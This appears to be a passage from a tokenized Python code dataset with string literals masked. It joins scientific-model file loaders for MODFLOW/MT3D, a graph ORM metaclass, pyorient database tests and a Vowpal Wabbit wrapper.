tunit ) ) <EOL> print ( '<STR_LIT>' . format ( lunit ) ) <EOL> print ( '<STR_LIT>' . format ( munit ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> trnop = f . readline ( ) [ : <NUM_LIT:20> ] . strip ( ) . split ( ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( trnop ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> laycon = np . empty ( ( nlay ) , np . int ) <EOL> laycon = read1d ( f , laycon ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( laycon ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> delr = Util2d . load ( f , model , ( ncol , <NUM_LIT:1> ) , np . float32 , '<STR_LIT>' , <EOL> ext_unit_dict ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( delr ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> delc = Util2d . load ( f , model , ( nrow , <NUM_LIT:1> ) , np . 
float32 , '<STR_LIT>' , <EOL> ext_unit_dict ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( delc ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> htop = Util2d . load ( f , model , ( nrow , ncol ) , np . float32 , '<STR_LIT>' , <EOL> ext_unit_dict ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( htop ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> dz = Util3d . load ( f , model , ( nlay , nrow , ncol ) , np . float32 , '<STR_LIT>' , <EOL> ext_unit_dict ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( dz ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> prsity = Util3d . load ( f , model , ( nlay , nrow , ncol ) , np . float32 , '<STR_LIT>' , <EOL> ext_unit_dict ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( prsity ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> icbund = Util3d . load ( f , model , ( nlay , nrow , ncol ) , np . int , '<STR_LIT>' , <EOL> ext_unit_dict ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( icbund ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> kwargs = { } <EOL> sconc = Util3d . load ( f , model , ( nlay , nrow , ncol ) , np . float32 , '<STR_LIT>' , <EOL> ext_unit_dict ) <EOL> if ncomp > <NUM_LIT:1> : <EOL> for icomp in range ( <NUM_LIT:2> , ncomp + <NUM_LIT:1> ) : <EOL> name = "<STR_LIT>" + str ( icomp ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( name ) ) <EOL> u3d = Util3d . load ( f , model , ( nlay , nrow , ncol ) , np . float32 , <EOL> name , ext_unit_dict ) <EOL> kwargs [ name ] = u3d <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( sconc ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> line = f . readline ( ) <EOL> cinact = float ( line [ <NUM_LIT:0> : <NUM_LIT:10> ] ) <EOL> try : <EOL> thkmin = float ( line [ <NUM_LIT:10> : <NUM_LIT:20> ] ) <EOL> except : <EOL> thkmin = <NUM_LIT> <EOL> if model . 
verbose : <EOL> print ( '<STR_LIT>' . format ( cinact ) ) <EOL> print ( '<STR_LIT>' . format ( thkmin ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> line = f . readline ( ) <EOL> ifmtcn = int ( line [ <NUM_LIT:0> : <NUM_LIT:10> ] ) <EOL> ifmtnp = int ( line [ <NUM_LIT:10> : <NUM_LIT:20> ] ) <EOL> ifmtrf = int ( line [ <NUM_LIT:20> : <NUM_LIT:30> ] ) <EOL> ifmtdp = int ( line [ <NUM_LIT:30> : <NUM_LIT> ] ) <EOL> savucn = False <EOL> if '<STR_LIT:t>' in line [ <NUM_LIT> : <NUM_LIT:50> ] . lower ( ) : <EOL> savucn = True <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( ifmtcn ) ) <EOL> print ( '<STR_LIT>' . format ( ifmtnp ) ) <EOL> print ( '<STR_LIT>' . format ( ifmtrf ) ) <EOL> print ( '<STR_LIT>' . format ( ifmtdp ) ) <EOL> print ( '<STR_LIT>' . format ( savucn ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> line = f . readline ( ) <EOL> nprs = int ( line [ <NUM_LIT:0> : <NUM_LIT:10> ] ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( nprs ) ) <EOL> timprs = None <EOL> if nprs > <NUM_LIT:0> : <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> timprs = np . empty ( ( nprs ) , dtype = np . float32 ) <EOL> read1d ( f , timprs ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( timprs ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> line = f . readline ( ) <EOL> nobs = int ( line [ <NUM_LIT:0> : <NUM_LIT:10> ] ) <EOL> try : <EOL> nprobs = int ( line [ <NUM_LIT:10> : <NUM_LIT:20> ] ) <EOL> except : <EOL> nprobs = <NUM_LIT:1> <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( nobs ) ) <EOL> print ( '<STR_LIT>' . format ( nprobs ) ) <EOL> obs = None <EOL> if nobs > <NUM_LIT:0> : <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> obs = [ ] <EOL> for l in range ( nobs ) : <EOL> line = f . 
readline ( ) <EOL> k = int ( line [ <NUM_LIT:0> : <NUM_LIT:10> ] ) <EOL> i = int ( line [ <NUM_LIT:10> : <NUM_LIT:20> ] ) <EOL> j = int ( line [ <NUM_LIT:20> : <NUM_LIT:30> ] ) <EOL> obs . append ( [ k , i , j ] ) <EOL> obs = np . array ( obs ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( obs ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> line = f . readline ( ) <EOL> chkmas = False <EOL> if '<STR_LIT:t>' in line [ <NUM_LIT:0> : <NUM_LIT:10> ] . lower ( ) : <EOL> chkmas = True <EOL> try : <EOL> nprmas = int ( line [ <NUM_LIT:10> : <NUM_LIT:20> ] ) <EOL> except : <EOL> nprmas = <NUM_LIT:1> <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( chkmas ) ) <EOL> print ( '<STR_LIT>' . format ( nprmas ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> dt0 , mxstrn , ttsmult , ttsmax = [ ] , [ ] , [ ] , [ ] <EOL> perlen = [ ] <EOL> nstp = [ ] <EOL> tsmult = [ ] <EOL> tslngh = [ ] <EOL> ssflag = [ ] <EOL> for kper in range ( nper ) : <EOL> line = f . readline ( ) <EOL> perlen . append ( float ( line [ <NUM_LIT:0> : <NUM_LIT:10> ] ) ) <EOL> nstp . append ( int ( line [ <NUM_LIT:10> : <NUM_LIT:20> ] ) ) <EOL> tsmult . append ( float ( line [ <NUM_LIT:20> : <NUM_LIT:30> ] ) ) <EOL> sf = '<STR_LIT:U+0020>' <EOL> ll = line [ <NUM_LIT:30> : ] . strip ( ) . split ( ) <EOL> if len ( ll ) > <NUM_LIT:0> : <EOL> if '<STR_LIT>' in ll [ <NUM_LIT:0> ] . lower ( ) : <EOL> sf = '<STR_LIT>' <EOL> ssflag . append ( sf ) <EOL> if tsmult [ - <NUM_LIT:1> ] < <NUM_LIT:0> : <EOL> t = np . empty ( ( nstp [ - <NUM_LIT:1> ] ) , dtype = np . float32 ) <EOL> read1d ( f , t ) <EOL> tslngh . append ( t ) <EOL> raise Exception ( "<STR_LIT>" ) <EOL> line = f . readline ( ) <EOL> dt0 . append ( float ( line [ <NUM_LIT:0> : <NUM_LIT:10> ] ) ) <EOL> mxstrn . append ( int ( line [ <NUM_LIT:10> : <NUM_LIT:20> ] ) ) <EOL> ttsmult . append ( float ( line [ <NUM_LIT:20> : <NUM_LIT:30> ] ) ) <EOL> ttsmax . 
append ( float ( line [ <NUM_LIT:30> : <NUM_LIT> ] ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( perlen ) ) <EOL> print ( '<STR_LIT>' . format ( nstp ) ) <EOL> print ( '<STR_LIT>' . format ( tsmult ) ) <EOL> print ( '<STR_LIT>' . format ( ssflag ) ) <EOL> print ( '<STR_LIT>' . format ( tslngh ) ) <EOL> print ( '<STR_LIT>' . format ( dt0 ) ) <EOL> print ( '<STR_LIT>' . format ( mxstrn ) ) <EOL> print ( '<STR_LIT>' . format ( ttsmult ) ) <EOL> print ( '<STR_LIT>' . format ( ttsmax ) ) <EOL> f . close ( ) <EOL> btn = Mt3dBtn ( model , nlay = nlay , nrow = nrow , ncol = ncol , nper = nper , <EOL> ncomp = ncomp , mcomp = mcomp , tunit = tunit , <EOL> laycon = laycon , delr = delr , delc = delc , htop = htop , dz = dz , <EOL> lunit = lunit , munit = munit , prsity = prsity , icbund = icbund , <EOL> sconc = sconc , cinact = cinact , thkmin = thkmin , <EOL> ifmtcn = ifmtcn , ifmtnp = ifmtnp , ifmtrf = ifmtrf , <EOL> ifmtdp = ifmtdp , savucn = savucn , nprs = nprs , <EOL> timprs = timprs , obs = obs , nprobs = nprobs , chkmas = chkmas , <EOL> nprmas = nprmas , perlen = perlen , nstp = nstp , tsmult = tsmult , <EOL> ssflag = ssflag , dt0 = dt0 , mxstrn = mxstrn , ttsmult = ttsmult , <EOL> ttsmax = ttsmax , ** kwargs ) <EOL> return btn </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> class NamData ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , pkgtype , name , handle , packages ) : <EOL> self . filehandle = handle <EOL> self . filename = name <EOL> self . filetype = pkgtype <EOL> self . package = None <EOL> if self . filetype . lower ( ) in packages : <EOL> self . package = packages [ self . filetype . lower ( ) ] <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" . format ( self . filename , self . filetype ) <EOL> def getfiletypeunit ( nf , filetype ) : <EOL> """<STR_LIT>""" <EOL> for cunit , cvals in nf . items ( ) : <EOL> if cvals . filetype . lower ( ) == filetype . lower ( ) : <EOL> return cunit <EOL> print ( '<STR_LIT>' . format ( filetype ) ) <EOL> return None <EOL> def testint ( cval ) : <EOL> try : <EOL> int ( cval ) <EOL> return True <EOL> except : <EOL> return False <EOL> def parsenamefile ( namfilename , packages , verbose = True ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . isfile ( namfilename ) : <EOL> if namfilename [ - <NUM_LIT:4> : ] . lower ( ) != '<STR_LIT>' : <EOL> namfilename += '<STR_LIT>' <EOL> ext_unit_dict = dict ( ) <EOL> if verbose : <EOL> print ( '<STR_LIT>' . format ( namfilename ) ) <EOL> print ( '<STR_LIT>' ) <EOL> if not os . path . isfile ( namfilename ) : <EOL> dn = os . path . dirname ( namfilename ) <EOL> s = '<STR_LIT>' . format ( namfilename , dn , os . listdir ( dn ) ) <EOL> raise Exception ( s ) <EOL> indata = open ( namfilename , '<STR_LIT:r>' ) . readlines ( ) <EOL> for line in indata : <EOL> tmp = line . strip ( ) . split ( ) <EOL> if len ( tmp ) == <NUM_LIT:0> : <EOL> continue <EOL> if '<STR_LIT:#>' not in tmp [ <NUM_LIT:0> ] : <EOL> if testint ( tmp [ <NUM_LIT:1> ] ) : <EOL> fname = os . path . join ( os . path . dirname ( namfilename ) , tmp [ <NUM_LIT:2> ] ) <EOL> if not os . path . isfile ( fname ) : <EOL> dn = os . path . dirname ( fname ) <EOL> fls = os . listdir ( dn ) <EOL> lownams = [ f . 
lower ( ) for f in fls ] <EOL> bname = os . path . basename ( fname ) <EOL> if bname . lower ( ) in lownams : <EOL> idx = lownams . index ( bname . lower ( ) ) <EOL> fname = os . path . join ( dn , fls [ idx ] ) <EOL> openmode = '<STR_LIT:r>' <EOL> if tmp [ <NUM_LIT:0> ] . upper ( ) == '<STR_LIT>' : <EOL> openmode = '<STR_LIT:rb>' <EOL> try : <EOL> filehandle = open ( fname , openmode ) <EOL> except : <EOL> if verbose : <EOL> print ( '<STR_LIT>' . format ( tmp [ <NUM_LIT:2> ] ) ) <EOL> filehandle = None <EOL> key = int ( tmp [ <NUM_LIT:1> ] ) <EOL> if key == <NUM_LIT:0> : <EOL> ftype = tmp [ <NUM_LIT:0> ] . lower ( ) <EOL> if ftype in packages : <EOL> key = packages [ ftype ] . unitnumber <EOL> else : <EOL> key = tmp [ <NUM_LIT:0> ] <EOL> ext_unit_dict [ key ] = NamData ( tmp [ <NUM_LIT:0> ] . upper ( ) , fname , filehandle , <EOL> packages ) <EOL> return ext_unit_dict </s>
<s> from . vertex import Vertex <EOL> from . edge import Edge <EOL> from . property import Property <EOL> from collections import OrderedDict <EOL> class DeclarativeMeta ( type ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( cls , class_name , bases , attrs ) : <EOL> if not hasattr ( cls , '<STR_LIT>' ) : <EOL> cls . registry = OrderedDict ( ) <EOL> cls . decl_root = cls <EOL> else : <EOL> decl_bases = set ( <EOL> base . decl_root for base in bases <EOL> if hasattr ( base , '<STR_LIT>' ) and base is not base . decl_root ) <EOL> if len ( decl_bases ) > <NUM_LIT:1> : <EOL> raise TypeError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if cls . decl_type is DeclarativeType . Vertex : <EOL> cls . registry_name = attrs . get ( '<STR_LIT>' <EOL> , cls . __name__ . lower ( ) ) <EOL> plural = attrs . get ( '<STR_LIT>' ) <EOL> if plural : <EOL> cls . registry_plural = plural <EOL> else : <EOL> label = attrs . get ( '<STR_LIT:label>' ) <EOL> if label : <EOL> cls . registry_name = cls . registry_plural = label <EOL> else : <EOL> cls . registry_name = cls . __name__ . lower ( ) <EOL> for prop in cls . __dict__ . values ( ) : <EOL> if not isinstance ( prop , Property ) : <EOL> continue <EOL> prop . _context = cls <EOL> cls . registry [ cls . registry_name ] = cls <EOL> return super ( DeclarativeMeta , cls ) . __init__ ( class_name , bases , attrs ) <EOL> def __setattr__ ( self , name , value ) : <EOL> if isinstance ( value , Property ) : <EOL> if value . context : <EOL> raise ValueError ( <EOL> '<STR_LIT>' ) <EOL> value . context = self <EOL> return super ( DeclarativeMeta , self ) . __setattr__ ( name , value ) <EOL> def __format__ ( self , format_spec ) : <EOL> """<STR_LIT>""" <EOL> return repr ( self . 
registry_name ) <EOL> class DeclarativeType ( object ) : <EOL> """<STR_LIT>""" <EOL> Vertex = <NUM_LIT:0> <EOL> Edge = <NUM_LIT:1> <EOL> def declarative_base ( decl_type , name , cls , metaclass , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> bases = cls if isinstance ( cls , tuple ) else ( cls , ) <EOL> class_dict = dict ( decl_type = decl_type ) <EOL> class_dict . update ( kwargs ) <EOL> return metaclass ( name , bases , class_dict ) <EOL> def declarative_node ( name = '<STR_LIT>' , cls = Vertex , metaclass = DeclarativeMeta <EOL> , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return declarative_base ( DeclarativeType . Vertex , name , cls , metaclass <EOL> , ** kwargs ) <EOL> def declarative_relationship ( name = '<STR_LIT>' , cls = Edge <EOL> , metaclass = DeclarativeMeta <EOL> , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return declarative_base ( DeclarativeType . Edge , name , cls , metaclass <EOL> , ** kwargs ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import sys <EOL> import os <EOL> import unittest <EOL> from pyorient . exceptions import * <EOL> from pyorient import OrientSocket <EOL> from pyorient . messages . connection import * <EOL> from pyorient . messages . database import * <EOL> from pyorient . messages . commands import * <EOL> from pyorient . messages . records import * <EOL> from pyorient . constants import * <EOL> os . environ [ '<STR_LIT>' ] = "<STR_LIT:1>" <EOL> os . environ [ '<STR_LIT>' ] = "<STR_LIT:0>" <EOL> if os . path . realpath ( '<STR_LIT>' ) not in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . realpath ( '<STR_LIT>' ) ) <EOL> if os . path . realpath ( '<STR_LIT:.>' ) not in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . realpath ( '<STR_LIT:.>' ) ) <EOL> class RawMessages_5_TestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_attach_class_hint ( self ) : <EOL> try : <EOL> connection = OrientSocket ( "<STR_LIT:localhost>" , <NUM_LIT> ) <EOL> tx = TxCommitMessage ( connection ) <EOL> tx . begin ( ) <EOL> tx . attach ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> assert False <EOL> except AssertionError as e : <EOL> assert '<STR_LIT>' == str ( e ) <EOL> assert True <EOL> def test_private_prepare ( self ) : <EOL> try : <EOL> connection = OrientSocket ( "<STR_LIT:localhost>" , <NUM_LIT> ) <EOL> DbOpenMessage ( connection ) . prepare ( <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , DB_TYPE_DOCUMENT , "<STR_LIT>" ) <EOL> ) . send ( ) . fetch_response ( ) <EOL> tx = TxCommitMessage ( connection ) <EOL> tx . begin ( ) <EOL> tx . prepare ( ) <EOL> assert False <EOL> except AttributeError as e : <EOL> print ( str ( e ) ) <EOL> assert True <EOL> def test_private_send ( self ) : <EOL> try : <EOL> connection = OrientSocket ( "<STR_LIT:localhost>" , <NUM_LIT> ) <EOL> DbOpenMessage ( connection ) . prepare ( <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , DB_TYPE_DOCUMENT , "<STR_LIT>" ) <EOL> ) . 
send ( ) . fetch_response ( ) <EOL> tx = TxCommitMessage ( connection ) <EOL> tx . begin ( ) <EOL> tx . send ( ) <EOL> assert False <EOL> except AttributeError as e : <EOL> print ( str ( e ) ) <EOL> assert True <EOL> def test_private_fetch ( self ) : <EOL> try : <EOL> connection = OrientSocket ( "<STR_LIT:localhost>" , <NUM_LIT> ) <EOL> DbOpenMessage ( connection ) . prepare ( <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , DB_TYPE_DOCUMENT , "<STR_LIT>" ) <EOL> ) . send ( ) . fetch_response ( ) <EOL> tx = TxCommitMessage ( connection ) <EOL> tx . begin ( ) <EOL> tx . fetch_response ( ) <EOL> assert False <EOL> except AttributeError as e : <EOL> print ( str ( e ) ) <EOL> assert True <EOL> def test_transaction ( self ) : <EOL> connection = OrientSocket ( "<STR_LIT:localhost>" , <NUM_LIT> ) <EOL> session_id = ( ConnectMessage ( connection ) ) . prepare ( ( "<STR_LIT:root>" , "<STR_LIT:root>" ) ) . send ( ) . fetch_response ( ) <EOL> db_name = "<STR_LIT>" <EOL> msg = DbExistsMessage ( connection ) <EOL> exists = msg . prepare ( [ db_name ] ) . send ( ) . fetch_response ( ) <EOL> print ( "<STR_LIT>" % exists ) <EOL> try : <EOL> ( DbDropMessage ( connection ) ) . prepare ( [ db_name ] ) . send ( ) . fetch_response ( ) <EOL> assert True <EOL> except PyOrientCommandException as e : <EOL> print ( str ( e ) ) <EOL> finally : <EOL> ( DbCreateMessage ( connection ) ) . prepare ( <EOL> ( db_name , DB_TYPE_GRAPH , STORAGE_TYPE_PLOCAL ) <EOL> ) . send ( ) . fetch_response ( ) <EOL> msg = DbOpenMessage ( connection ) <EOL> cluster_info = msg . prepare ( <EOL> ( db_name , "<STR_LIT>" , "<STR_LIT>" , DB_TYPE_GRAPH , "<STR_LIT>" ) <EOL> ) . send ( ) . fetch_response ( ) <EOL> try : <EOL> create_class = CommandMessage ( connection ) <EOL> create_class . prepare ( ( QUERY_CMD , "<STR_LIT>" ) ) . send ( ) . 
fetch_response ( ) <EOL> except PyOrientCommandException as e : <EOL> pass <EOL> rec0 = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> real_record1 = ( RecordCreateMessage ( connection ) ) . prepare ( ( <NUM_LIT:3> , rec0 ) ) . send ( ) . fetch_response ( ) <EOL> rec3 = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> temp_update_real_rec = ( RecordUpdateMessage ( connection ) ) . prepare ( ( <NUM_LIT:3> , real_record1 . _rid , rec3 , real_record1 . _version ) ) <EOL> rec1 = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> temp_record1 = ( RecordCreateMessage ( connection ) ) . prepare ( ( - <NUM_LIT:1> , rec1 ) ) <EOL> rec2 = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> temp_record2 = ( RecordCreateMessage ( connection ) ) . prepare ( ( - <NUM_LIT:1> , rec2 ) ) <EOL> delete_real_rec = RecordDeleteMessage ( connection ) <EOL> delete_real_rec . prepare ( ( <NUM_LIT:3> , real_record1 . _rid ) ) <EOL> rec = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> real_record1 = ( RecordCreateMessage ( connection ) ) . prepare ( ( <NUM_LIT:3> , rec ) ) . send ( ) . fetch_response ( ) <EOL> tx = TxCommitMessage ( connection ) <EOL> tx . begin ( ) <EOL> tx . attach ( temp_record1 ) <EOL> tx . attach ( temp_record2 ) <EOL> tx . attach ( temp_update_real_rec ) <EOL> tx . attach ( delete_real_rec ) <EOL> res = tx . commit ( ) <EOL> for k , v in res . items ( ) : <EOL> print ( k + "<STR_LIT>" + v . vacanza ) <EOL> assert len ( res ) == <NUM_LIT:2> <EOL> assert res [ "<STR_LIT>" ] . vacanza == '<STR_LIT>' <EOL> assert res [ "<STR_LIT>" ] . vacanza == '<STR_LIT>' <EOL> sid = ( ConnectMessage ( connection ) ) . prepare ( ( "<STR_LIT:root>" , "<STR_LIT:root>" ) ) . send ( ) . fetch_response ( ) <EOL> ( DbDropMessage ( connection ) ) . 
prepare ( [ db_name , STORAGE_TYPE_MEMORY ] ) . send ( ) . fetch_response ( ) </s>
<s> from __future__ import print_function , division , absolute_import , unicode_literals <EOL> """<STR_LIT>""" <EOL> __author__ = "<STR_LIT>" <EOL> __email__ = '<STR_LIT>' <EOL> __version__ = '<STR_LIT>' <EOL> try : <EOL> basestring <EOL> except : <EOL> basestring = str <EOL> import logging <EOL> import re <EOL> import pexpect <EOL> from . import active_learner <EOL> class WabbitInvalidCharacter ( ValueError ) : <EOL> pass <EOL> validation_regex = re . compile ( r'<STR_LIT>' ) <EOL> def validate_vw_string ( s ) : <EOL> """<STR_LIT>""" <EOL> if validation_regex . search ( s ) : <EOL> raise WabbitInvalidCharacter ( s ) <EOL> escape_dict = { '<STR_LIT:U+0020>' : r'<STR_LIT>' , <EOL> '<STR_LIT::>' : r'<STR_LIT>' , <EOL> '<STR_LIT:|>' : r'<STR_LIT:\\>' <EOL> } <EOL> def escape_vw_character ( special_character_re_match ) : <EOL> special_character = special_character_re_match . group ( ) <EOL> return escape_dict [ special_character ] <EOL> def escape_vw_string ( s ) : <EOL> escaped_s = validation_regex . sub ( escape_vw_character , s ) <EOL> return escaped_s <EOL> class Namespace ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , <EOL> name = None , <EOL> scale = None , <EOL> features = None , <EOL> escape = True , <EOL> validate = True , <EOL> cache_string = False ) : <EOL> """<STR_LIT>""" <EOL> self . name = name <EOL> self . scale = scale <EOL> self . validate = validate <EOL> self . escape = escape <EOL> self . _string = None <EOL> self . features = [ ] <EOL> self . cache_string = cache_string <EOL> if name : <EOL> if escape : <EOL> self . name = escape_vw_string ( self . name ) <EOL> elif validate : <EOL> validate_vw_string ( self . name ) <EOL> if features : <EOL> self . add_features ( features ) <EOL> def add_features ( self , features ) : <EOL> """<STR_LIT>""" <EOL> for feature in features : <EOL> if isinstance ( feature , basestring ) : <EOL> label = feature <EOL> value = None <EOL> else : <EOL> label , value = feature <EOL> self . 
add_feature ( label , value ) <EOL> def add_feature ( self , label , value = None ) : <EOL> """<STR_LIT>""" <EOL> if self . escape : <EOL> label = escape_vw_string ( label ) <EOL> elif self . validate : <EOL> validate_vw_string ( label ) <EOL> feature = ( label , value ) <EOL> self . features . append ( feature ) <EOL> def to_string ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _string is None : <EOL> tokens = [ ] <EOL> if self . name : <EOL> if self . scale : <EOL> token = self . name + '<STR_LIT::>' + str ( self . scale ) <EOL> else : <EOL> token = self . name <EOL> else : <EOL> token = '<STR_LIT>' <EOL> tokens . append ( token ) <EOL> for label , value in self . features : <EOL> if value is None : <EOL> token = label <EOL> else : <EOL> token = label + '<STR_LIT::>' + str ( value ) <EOL> tokens . append ( token ) <EOL> tokens . append ( '<STR_LIT>' ) <EOL> output = '<STR_LIT:U+0020>' . join ( tokens ) <EOL> if self . cache_string : <EOL> self . _string = output <EOL> else : <EOL> output = self . _string <EOL> return output <EOL> def export_features ( self , delimiter = '<STR_LIT:\\>' ) : <EOL> """<STR_LIT>""" <EOL> result_list = [ ] <EOL> for feature in self . features : <EOL> result = '<STR_LIT>' . format ( self . name , delimiter , feature ) <EOL> result_list . append ( result ) <EOL> return result_list <EOL> class VWResult ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , result_string , active_mode = False ) : <EOL> """<STR_LIT>""" <EOL> self . raw_output = result_string <EOL> result_list = [ ] <EOL> for token in result_string . split ( ) : <EOL> try : <EOL> result = float ( token ) <EOL> result_list . append ( result ) <EOL> except ValueError : <EOL> logging . debug ( "<STR_LIT>" . format ( token ) ) <EOL> self . value_list = result_list <EOL> if result_list : <EOL> self . prediction = result_list [ <NUM_LIT:0> ] <EOL> else : <EOL> self . prediction = None <EOL> if active_mode : <EOL> if len ( result_list ) > <NUM_LIT:1> : <EOL> self . 
importance = result_list [ <NUM_LIT:1> ] <EOL> else : <EOL> self . importance = <NUM_LIT:0.> <EOL> def __str__ ( self ) : <EOL> return str ( self . __dict__ ) <EOL> class VW ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , command = None , active_mode = False , dummy_mode = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if command is None : <EOL> if active_mode : <EOL> active_settings = active_learner . get_active_default_settings ( ) <EOL> active_settings . update ( kwargs ) <EOL> kwargs = active_settings <EOL> port = kwargs . get ( '<STR_LIT:port>' ) <EOL> command = make_command_line ( ** kwargs ) <EOL> self . active_mode = active_mode <EOL> self . dummy_mode = dummy_mode <EOL> if dummy_mode : <EOL> self . vw_process = None <EOL> else : <EOL> if active_mode : <EOL> self . vw_process = active_learner . ActiveVWProcess ( command , port = port ) <EOL> else : <EOL> self . vw_process = pexpect . spawn ( command ) <EOL> self . vw_process . delaybeforesend = <NUM_LIT:0> <EOL> self . vw_process . setecho ( False ) <EOL> logging . info ( "<STR_LIT>" . format ( command ) ) <EOL> self . command = command <EOL> self . namespaces = [ ] <EOL> self . _line = None <EOL> def send_line ( self , line , parse_result = True ) : <EOL> """<STR_LIT>""" <EOL> self . vw_process . sendline ( line ) <EOL> result = self . _get_response ( parse_result = parse_result ) <EOL> return result <EOL> def _get_response ( self , parse_result = True ) : <EOL> """<STR_LIT>""" <EOL> self . vw_process . expect_exact ( '<STR_LIT:\r\n>' , searchwindowsize = - <NUM_LIT:1> ) <EOL> if parse_result : <EOL> output = self . vw_process . before <EOL> result_struct = VWResult ( output , active_mode = self . active_mode ) <EOL> else : <EOL> result_struct = None <EOL> return result_struct <EOL> def send_example ( self , <EOL> * args , <EOL> ** kwargs <EOL> ) : <EOL> """<STR_LIT>""" <EOL> parse_result = kwargs . pop ( '<STR_LIT>' , True ) <EOL> line = self . 
make_line ( * args , ** kwargs ) <EOL> result = self . send_line ( line , parse_result = parse_result ) <EOL> return result <EOL> def make_line ( self , <EOL> response = None , <EOL> importance = None , <EOL> base = None , <EOL> tag = None , <EOL> features = None , <EOL> namespaces = None , <EOL> ) : <EOL> """<STR_LIT>""" <EOL> if namespaces is not None : <EOL> self . add_namespaces ( namespaces ) <EOL> if features is not None : <EOL> namespace = Namespace ( features = features ) <EOL> self . add_namespace ( namespace ) <EOL> substrings = [ ] <EOL> tokens = [ ] <EOL> if response is not None : <EOL> token = str ( response ) <EOL> tokens . append ( token ) <EOL> if importance is not None : <EOL> token = str ( importance ) <EOL> tokens . append ( token ) <EOL> if base is not None : <EOL> token = str ( base ) <EOL> tokens . append ( token ) <EOL> if tag is not None : <EOL> token = "<STR_LIT:'>" + str ( tag ) <EOL> tokens . append ( token ) <EOL> else : <EOL> token = "<STR_LIT>" <EOL> tokens . append ( token ) <EOL> substring = '<STR_LIT:U+0020>' . join ( tokens ) <EOL> substrings . append ( substring ) <EOL> if self . namespaces : <EOL> for namespace in self . namespaces : <EOL> substring = namespace . to_string ( ) <EOL> substrings . append ( substring ) <EOL> else : <EOL> substrings . append ( '<STR_LIT>' ) <EOL> line = '<STR_LIT:|>' . join ( substrings ) <EOL> self . _line = line <EOL> self . namespaces = [ ] <EOL> return line <EOL> def add_namespace ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if args and isinstance ( args [ <NUM_LIT:0> ] , Namespace ) : <EOL> namespace = args [ <NUM_LIT:0> ] <EOL> elif isinstance ( kwargs . get ( '<STR_LIT>' ) , Namespace ) : <EOL> namespace = kwargs . get ( '<STR_LIT>' ) <EOL> else : <EOL> namespace = 